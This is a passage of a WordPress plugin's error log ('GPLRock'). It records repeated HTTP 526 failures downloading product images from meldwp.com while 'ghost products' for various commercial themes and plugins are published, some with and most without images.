2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-plugin-bundle---elementor-addons-27124.webp for product woocommerce-plugin-bundle-elementor-addons after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:47 UTC] GPLRock: Image download failed for product woocommerce-plugin-bundle-elementor-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:49 UTC] GPLRock: Image download failed for product woocommerce-plugin-bundle-elementor-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-plugin-bundle---elementor-addons-27124.webp for product woocommerce-plugin-bundle-elementor-addons after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:51 UTC] GPLRock WARNING: Image download failed for product woocommerce-plugin-bundle-elementor-addons. URL: https://meldwp.com/wp-content/uploads/woocommerce-plugin-bundle---elementor-addons-27124.webp [06-Apr-2026 08:27:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-plugin-bundle-elementor-addons [06-Apr-2026 08:46:15 UTC] GPLRock: Image downloaded successfully for product quickshop-responsive-shopify-sections-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-30d574fb.webp [06-Apr-2026 08:46:15 UTC] GPLRock: Using pre-downloaded image for product quickshop-responsive-shopify-sections-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-30d574fb.webp [06-Apr-2026 08:46:15 UTC] GPLRock: Ghost product published with image - Product ID: quickshop-responsive-shopify-sections-theme [06-Apr-2026 08:46:15 UTC] GPLRock: Image download failed for product clinique-wellness-luxury-spa-resort-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:18 UTC] GPLRock: Image download failed for product clinique-wellness-luxury-spa-resort-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clinique---wellness-luxury-spa-resort-wordpress-theme-2828.webp for product clinique-wellness-luxury-spa-resort-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:46:20 UTC] GPLRock: Image download failed for product clinique-wellness-luxury-spa-resort-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:22 UTC] GPLRock: Image download failed for product clinique-wellness-luxury-spa-resort-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clinique---wellness-luxury-spa-resort-wordpress-theme-2828.webp for product clinique-wellness-luxury-spa-resort-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:46:24 UTC] GPLRock WARNING: Image download failed for product clinique-wellness-luxury-spa-resort-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/clinique---wellness-luxury-spa-resort-wordpress-theme-2828.webp [06-Apr-2026 08:46:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: clinique-wellness-luxury-spa-resort-wordpress-theme [06-Apr-2026 08:46:24 UTC] GPLRock: Image download failed for product cindy-accessible-local-government-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:26 UTC] GPLRock: Image download failed for product cindy-accessible-local-government-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cindy---accessible-local-government-wordpress-theme-20011.webp for product cindy-accessible-local-government-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:46:28 UTC] GPLRock: Image download failed for product cindy-accessible-local-government-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:31 UTC] GPLRock: Image download failed for product cindy-accessible-local-government-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cindy---accessible-local-government-wordpress-theme-20011.webp for product cindy-accessible-local-government-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:46:33 UTC] GPLRock WARNING: Image download failed for product cindy-accessible-local-government-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cindy---accessible-local-government-wordpress-theme-20011.webp [06-Apr-2026 08:46:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cindy-accessible-local-government-wordpress-theme [06-Apr-2026 08:46:33 UTC] GPLRock: Image download failed for product thefutur-creative-portfolio-agency-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:35 UTC] GPLRock: Image download failed for product thefutur-creative-portfolio-agency-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thefutur---creative-portfolio--agency-theme-20027.webp for product thefutur-creative-portfolio-agency-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:46:37 UTC] GPLRock: Image download failed for product thefutur-creative-portfolio-agency-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:39 UTC] GPLRock: Image download failed for product thefutur-creative-portfolio-agency-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thefutur---creative-portfolio--agency-theme-20027.webp for product thefutur-creative-portfolio-agency-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:46:41 UTC] GPLRock WARNING: Image download failed for product thefutur-creative-portfolio-agency-theme. URL: https://meldwp.com/wp-content/uploads/thefutur---creative-portfolio--agency-theme-20027.webp [06-Apr-2026 08:46:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: thefutur-creative-portfolio-agency-theme [06-Apr-2026 08:46:42 UTC] GPLRock: Image download failed for product cizarua-responsive-one-page-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:44 UTC] GPLRock: Image download failed for product cizarua-responsive-one-page-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cizarua---responsive-one-page-portfolio-theme-16654.webp for product cizarua-responsive-one-page-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:46:46 UTC] GPLRock: Image download failed for product cizarua-responsive-one-page-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:48 UTC] GPLRock: Image download failed for product cizarua-responsive-one-page-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cizarua---responsive-one-page-portfolio-theme-16654.webp for product cizarua-responsive-one-page-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:46:50 UTC] GPLRock WARNING: Image download failed for product cizarua-responsive-one-page-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/cizarua---responsive-one-page-portfolio-theme-16654.webp [06-Apr-2026 08:46:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cizarua-responsive-one-page-portfolio-theme [06-Apr-2026 08:46:50 UTC] GPLRock: Image downloaded successfully for product psycholox-psychology-counseling-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d49a3b92.webp [06-Apr-2026 08:46:50 UTC] GPLRock: Using pre-downloaded image for product psycholox-psychology-counseling-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d49a3b92.webp [06-Apr-2026 08:46:50 UTC] GPLRock: Ghost product published with image - Product ID: psycholox-psychology-counseling-wordpress-theme [06-Apr-2026 08:46:50 UTC] GPLRock: Image download failed for product melodica-music-band-musician-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:52 UTC] GPLRock: Image download failed for product melodica-music-band-musician-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/melodica---music-band--musician-wordpress-theme-30865.webp for product melodica-music-band-musician-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:46:55 UTC] GPLRock: Image download failed for product melodica-music-band-musician-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:57 UTC] GPLRock: Image download failed for product melodica-music-band-musician-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:46:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/melodica---music-band--musician-wordpress-theme-30865.webp for product melodica-music-band-musician-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:46:59 UTC] GPLRock WARNING: Image download failed for product melodica-music-band-musician-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/melodica---music-band--musician-wordpress-theme-30865.webp [06-Apr-2026 08:46:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: melodica-music-band-musician-wordpress-theme [06-Apr-2026 08:46:59 UTC] GPLRock: Image download failed for product agrox-agriculture-organic-farming-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:01 UTC] GPLRock: Image download failed for product agrox-agriculture-organic-farming-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agrox---agriculture-organic-farming-wordpress-theme-3886.webp for product agrox-agriculture-organic-farming-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:47:03 UTC] GPLRock: Image download failed for product agrox-agriculture-organic-farming-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:06 UTC] GPLRock: Image download failed for product agrox-agriculture-organic-farming-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agrox---agriculture-organic-farming-wordpress-theme-3886.webp for product agrox-agriculture-organic-farming-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:47:08 UTC] GPLRock WARNING: Image download failed for product agrox-agriculture-organic-farming-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agrox---agriculture-organic-farming-wordpress-theme-3886.webp [06-Apr-2026 08:47:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agrox-agriculture-organic-farming-wordpress-theme [06-Apr-2026 08:47:08 UTC] GPLRock: Image download failed for product cryptcon-ico-nft-and-crypto-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:10 UTC] GPLRock: Image download failed for product cryptcon-ico-nft-and-crypto-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptcon--ico-nft-and-crypto-wordpress-theme-15752.webp for product cryptcon-ico-nft-and-crypto-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:47:12 UTC] GPLRock: Image download failed for product cryptcon-ico-nft-and-crypto-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:14 UTC] GPLRock: Image download failed for product cryptcon-ico-nft-and-crypto-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptcon--ico-nft-and-crypto-wordpress-theme-15752.webp for product cryptcon-ico-nft-and-crypto-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:47:16 UTC] GPLRock WARNING: Image download failed for product cryptcon-ico-nft-and-crypto-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cryptcon--ico-nft-and-crypto-wordpress-theme-15752.webp [06-Apr-2026 08:47:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cryptcon-ico-nft-and-crypto-wordpress-theme [06-Apr-2026 08:47:16 UTC] GPLRock: Image download failed for product grwla-digital-agency-studio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:18 UTC] GPLRock: Image download failed for product grwla-digital-agency-studio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grwla--digital-agency--studio-wordpress-theme-30825.webp for product grwla-digital-agency-studio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:47:21 UTC] GPLRock: Image download failed for product grwla-digital-agency-studio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:23 UTC] GPLRock: Image download failed for product grwla-digital-agency-studio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grwla--digital-agency--studio-wordpress-theme-30825.webp for product grwla-digital-agency-studio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:47:25 UTC] GPLRock WARNING: Image download failed for product grwla-digital-agency-studio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/grwla--digital-agency--studio-wordpress-theme-30825.webp [06-Apr-2026 08:47:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grwla-digital-agency-studio-wordpress-theme [06-Apr-2026 08:47:45 UTC] GPLRock: Image downloaded successfully for product trash-mails-temporary-email-address-system (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8a486642.webp [06-Apr-2026 08:47:45 UTC] GPLRock: Using pre-downloaded image for product trash-mails-temporary-email-address-system: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8a486642.webp [06-Apr-2026 08:47:45 UTC] GPLRock: Ghost product published with image - Product ID: trash-mails-temporary-email-address-system [06-Apr-2026 08:47:45 UTC] GPLRock: Image download failed for product flutter-travel-app-with-admin-panel-travel-hour (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:47 UTC] GPLRock: Image download failed for product flutter-travel-app-with-admin-panel-travel-hour (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flutter-travel-app-with-admin-panel---travel-hour-8390.webp for product flutter-travel-app-with-admin-panel-travel-hour after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:47:49 UTC] GPLRock: Image download failed for product flutter-travel-app-with-admin-panel-travel-hour (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:51 UTC] GPLRock: Image download failed for product flutter-travel-app-with-admin-panel-travel-hour (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flutter-travel-app-with-admin-panel---travel-hour-8390.webp for product flutter-travel-app-with-admin-panel-travel-hour after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:47:53 UTC] GPLRock WARNING: Image download failed for product flutter-travel-app-with-admin-panel-travel-hour. URL: https://meldwp.com/wp-content/uploads/flutter-travel-app-with-admin-panel---travel-hour-8390.webp [06-Apr-2026 08:47:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flutter-travel-app-with-admin-panel-travel-hour [06-Apr-2026 08:47:53 UTC] GPLRock: Image downloaded successfully for product interactive-service-add-on-with-hover-effects-for-wpbakery (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2c0a9f4d.webp [06-Apr-2026 08:47:53 UTC] GPLRock: Using pre-downloaded image for product interactive-service-add-on-with-hover-effects-for-wpbakery: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2c0a9f4d.webp [06-Apr-2026 08:47:53 UTC] GPLRock: Ghost product published with image - Product ID: interactive-service-add-on-with-hover-effects-for-wpbakery [06-Apr-2026 08:47:53 UTC] GPLRock: Image download failed for product css3-vertical-web-pricing-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:56 UTC] GPLRock: Image download failed for product css3-vertical-web-pricing-tables (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:47:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/css3-vertical-web-pricing-tables-15839.webp for product css3-vertical-web-pricing-tables after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:47:58 UTC] GPLRock: Image download failed for product css3-vertical-web-pricing-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:00 UTC] GPLRock: Image download failed for product css3-vertical-web-pricing-tables (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/css3-vertical-web-pricing-tables-15839.webp for product css3-vertical-web-pricing-tables after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:02 UTC] GPLRock WARNING: Image download failed for product css3-vertical-web-pricing-tables. URL: https://meldwp.com/wp-content/uploads/css3-vertical-web-pricing-tables-15839.webp [06-Apr-2026 08:48:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: css3-vertical-web-pricing-tables [06-Apr-2026 08:48:02 UTC] GPLRock: Image download failed for product gutensearch-amazon-affiliates-products-search-and-embed (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:04 UTC] GPLRock: Image download failed for product gutensearch-amazon-affiliates-products-search-and-embed (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gutensearch---amazon-affiliates-products-search-and-embed-3146.webp for product gutensearch-amazon-affiliates-products-search-and-embed after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:06 UTC] GPLRock: Image download failed for product gutensearch-amazon-affiliates-products-search-and-embed (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:08 UTC] GPLRock: Image download failed for product gutensearch-amazon-affiliates-products-search-and-embed (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gutensearch---amazon-affiliates-products-search-and-embed-3146.webp for product gutensearch-amazon-affiliates-products-search-and-embed after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:11 UTC] GPLRock WARNING: Image download failed for product gutensearch-amazon-affiliates-products-search-and-embed. URL: https://meldwp.com/wp-content/uploads/gutensearch---amazon-affiliates-products-search-and-embed-3146.webp [06-Apr-2026 08:48:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gutensearch-amazon-affiliates-products-search-and-embed [06-Apr-2026 08:48:11 UTC] GPLRock: Image download failed for product wpbakery-page-builder-extensions-add-on-testimonial-carousel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:13 UTC] GPLRock: Image download failed for product wpbakery-page-builder-extensions-add-on-testimonial-carousel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-extensions-add-on---testimonial-carousel-32873.webp for product wpbakery-page-builder-extensions-add-on-testimonial-carousel after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:15 UTC] GPLRock: Image download failed for product wpbakery-page-builder-extensions-add-on-testimonial-carousel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:17 UTC] GPLRock: Image download failed for product wpbakery-page-builder-extensions-add-on-testimonial-carousel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-extensions-add-on---testimonial-carousel-32873.webp for product wpbakery-page-builder-extensions-add-on-testimonial-carousel after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:20 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-extensions-add-on-testimonial-carousel. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-extensions-add-on---testimonial-carousel-32873.webp [06-Apr-2026 08:48:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-extensions-add-on-testimonial-carousel [06-Apr-2026 08:48:20 UTC] GPLRock: Image download failed for product sendy-widget-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:22 UTC] GPLRock: Image download failed for product sendy-widget-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sendy-widget-pro-31425.webp for product sendy-widget-pro after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:24 UTC] GPLRock: Image download failed for product sendy-widget-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:26 UTC] GPLRock: Image download failed for product sendy-widget-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sendy-widget-pro-31425.webp for product sendy-widget-pro after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:28 UTC] GPLRock WARNING: Image download failed for product sendy-widget-pro. URL: https://meldwp.com/wp-content/uploads/sendy-widget-pro-31425.webp [06-Apr-2026 08:48:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sendy-widget-pro [06-Apr-2026 08:48:28 UTC] GPLRock: Image download failed for product mercado-pro-turn-your-woocommerce-into-multi-vendor-marketplace (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:30 UTC] GPLRock: Image download failed for product mercado-pro-turn-your-woocommerce-into-multi-vendor-marketplace (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mercado-pro---turn-your-woocommerce-into-multi-vendor-marketplace-19791.webp for product mercado-pro-turn-your-woocommerce-into-multi-vendor-marketplace after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:33 UTC] GPLRock: Image download failed for product mercado-pro-turn-your-woocommerce-into-multi-vendor-marketplace (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:35 UTC] GPLRock: Image download failed for product mercado-pro-turn-your-woocommerce-into-multi-vendor-marketplace (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mercado-pro---turn-your-woocommerce-into-multi-vendor-marketplace-19791.webp for product mercado-pro-turn-your-woocommerce-into-multi-vendor-marketplace after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:37 UTC] GPLRock WARNING: Image download failed for product mercado-pro-turn-your-woocommerce-into-multi-vendor-marketplace. URL: https://meldwp.com/wp-content/uploads/mercado-pro---turn-your-woocommerce-into-multi-vendor-marketplace-19791.webp [06-Apr-2026 08:48:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mercado-pro-turn-your-woocommerce-into-multi-vendor-marketplace [06-Apr-2026 08:48:37 UTC] GPLRock: Image download failed for product wpforms-tooltips (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:39 UTC] GPLRock: Image download failed for product wpforms-tooltips (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpforms-tooltips-13994.webp for product wpforms-tooltips after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:41 UTC] GPLRock: Image download failed for product wpforms-tooltips (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:43 UTC] GPLRock: Image download failed for product wpforms-tooltips (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpforms-tooltips-13994.webp for product wpforms-tooltips after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:45 UTC] GPLRock WARNING: Image download failed for product wpforms-tooltips. URL: https://meldwp.com/wp-content/uploads/wpforms-tooltips-13994.webp [06-Apr-2026 08:48:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpforms-tooltips [06-Apr-2026 08:48:46 UTC] GPLRock: Image download failed for product monkey-budget-planner (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:48 UTC] GPLRock: Image download failed for product monkey-budget-planner (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monkey-budget-planner-18405.webp for product monkey-budget-planner after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:50 UTC] GPLRock: Image download failed for product monkey-budget-planner (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:52 UTC] GPLRock: Image download failed for product monkey-budget-planner (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:48:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monkey-budget-planner-18405.webp for product monkey-budget-planner after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:48:54 UTC] GPLRock WARNING: Image download failed for product monkey-budget-planner. URL: https://meldwp.com/wp-content/uploads/monkey-budget-planner-18405.webp [06-Apr-2026 08:48:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: monkey-budget-planner [06-Apr-2026 08:49:59 UTC] GPLRock: Image download failed for product piclo-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:01 UTC] GPLRock: Image download failed for product piclo-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/piclo---digital-agency-wordpress-theme-18687.webp for product piclo-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:03 UTC] GPLRock: Image download failed for product piclo-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:05 UTC] GPLRock: Image download failed for product piclo-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/piclo---digital-agency-wordpress-theme-18687.webp for product piclo-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:07 UTC] GPLRock WARNING: Image download failed for product piclo-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/piclo---digital-agency-wordpress-theme-18687.webp [06-Apr-2026 08:50:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: piclo-digital-agency-wordpress-theme [06-Apr-2026 08:50:08 UTC] GPLRock: Image download failed for product drox-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:10 UTC] GPLRock: Image download failed for product drox-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/drox---agency--portfolio-wordpress-theme-28306.webp for product drox-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:12 UTC] GPLRock: Image download failed for product drox-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:14 UTC] GPLRock: Image download failed for product drox-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/drox---agency--portfolio-wordpress-theme-28306.webp for product drox-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:16 UTC] GPLRock WARNING: Image download failed for product drox-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/drox---agency--portfolio-wordpress-theme-28306.webp [06-Apr-2026 08:50:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: drox-agency-portfolio-wordpress-theme [06-Apr-2026 08:50:16 UTC] 